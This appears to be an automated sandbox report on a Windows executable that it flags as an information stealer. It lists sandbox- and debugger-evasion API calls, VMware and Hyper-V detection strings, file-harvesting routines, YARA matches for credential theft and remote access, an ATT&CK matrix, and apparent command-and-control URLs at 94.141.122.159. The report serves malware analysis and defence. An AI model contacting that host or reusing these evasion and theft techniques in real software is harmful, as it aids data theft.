                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26394
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeEvaded block: after key decisiongraph_0-27555
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeAPI coverage: 6.5 %
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0081C0D7
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0081DCE7
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0081E077
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00824107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00824107
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0081F917
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00811937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00811937
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0081E697
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0081EF87
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_008247D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_008247D7
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00823B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00823B17
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00824B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00824B77
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: Amcache.hve.5.drBinary or memory string: VMware
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr
                      Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.5.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmp, uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwares
                      Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeAPI call chain: ExitProcess graph end nodegraph_0-26379
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeAPI call chain: ExitProcess graph end nodegraph_0-26382
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeAPI call chain: ExitProcess graph end nodegraph_0-26399
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeAPI call chain: ExitProcess graph end nodegraph_0-26393
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeAPI call chain: ExitProcess graph end nodegraph_0-26221
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeAPI call chain: ExitProcess graph end nodegraph_0-26422
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeAPI call chain: ExitProcess graph end nodegraph_0-26267
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00810D90 mov eax, dword ptr fs:[00000030h]0_2_00810D90
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_008299B7 mov eax, dword ptr fs:[00000030h]0_2_008299B7
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0081092B mov eax, dword ptr fs:[00000030h]0_2_0081092B
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0089AC23 push dword ptr fs:[00000030h]0_2_0089AC23
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0082B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0082B5A1
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0082D151 SetUnhandledExceptionFilter,0_2_0082D151
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_0082AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0082AFAF
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: uCEeVGAWIB.exe PID: 1120, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00829867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00829867
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00827DF7
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\uCEeVGAWIB.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0.2.uCEeVGAWIB.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.uCEeVGAWIB.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.uCEeVGAWIB.exe.810e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.uCEeVGAWIB.exe.b80000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.uCEeVGAWIB.exe.b80000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.uCEeVGAWIB.exe.810e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2173056951.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: uCEeVGAWIB.exe PID: 1120, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.uCEeVGAWIB.exe.400000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.uCEeVGAWIB.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.uCEeVGAWIB.exe.810e67.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.uCEeVGAWIB.exe.b80000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.uCEeVGAWIB.exe.b80000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.uCEeVGAWIB.exe.810e67.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.2173056951.0000000000B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: uCEeVGAWIB.exe PID: 1120, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                      Native API
                      1
                      DLL Side-Loading
                      11
                      Process Injection
                      1
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote ServicesData from Local System1
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory31
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable Media2
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                      Disable or Modify Tools
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared Drive2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                      Process Injection
                      NTDS11
                      Process Discovery
                      Distributed Component Object ModelInput Capture12
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      Account Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                      Obfuscated Files or Information
                      Cached Domain Credentials1
                      System Owner/User Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                      Software Packing
                      DCSync1
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc Filesystem123
                      System Information Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      uCEeVGAWIB.exe32%ReversingLabs
                      uCEeVGAWIB.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      No contacted domains info
                      NameMaliciousAntivirus DetectionReputation
                      http://94.141.122.159/true
                        unknown
                        http://94.141.122.159/baf27292fb61e144.phptrue
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://94.141.122.159/baf27292fb61e144.php?FuCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://94.141.122.159uCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, uCEeVGAWIB.exe, 00000000.00000002.2241108646.000000000088E000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              http://94.141.122.159/YuCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://94.141.122.159/UuCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://94.141.122.159/baf27292fb61e144.phpOGuCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://upx.sf.netAmcache.hve.5.drfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://94.141.122.159/baf27292fb61e144.phpSuCEeVGAWIB.exe, 00000000.00000002.2241198654.00000000008C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://94.141.122.159/baf27292fb61e144.phpRuCEeVGAWIB.exe, 00000000.00000002.2241198654.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
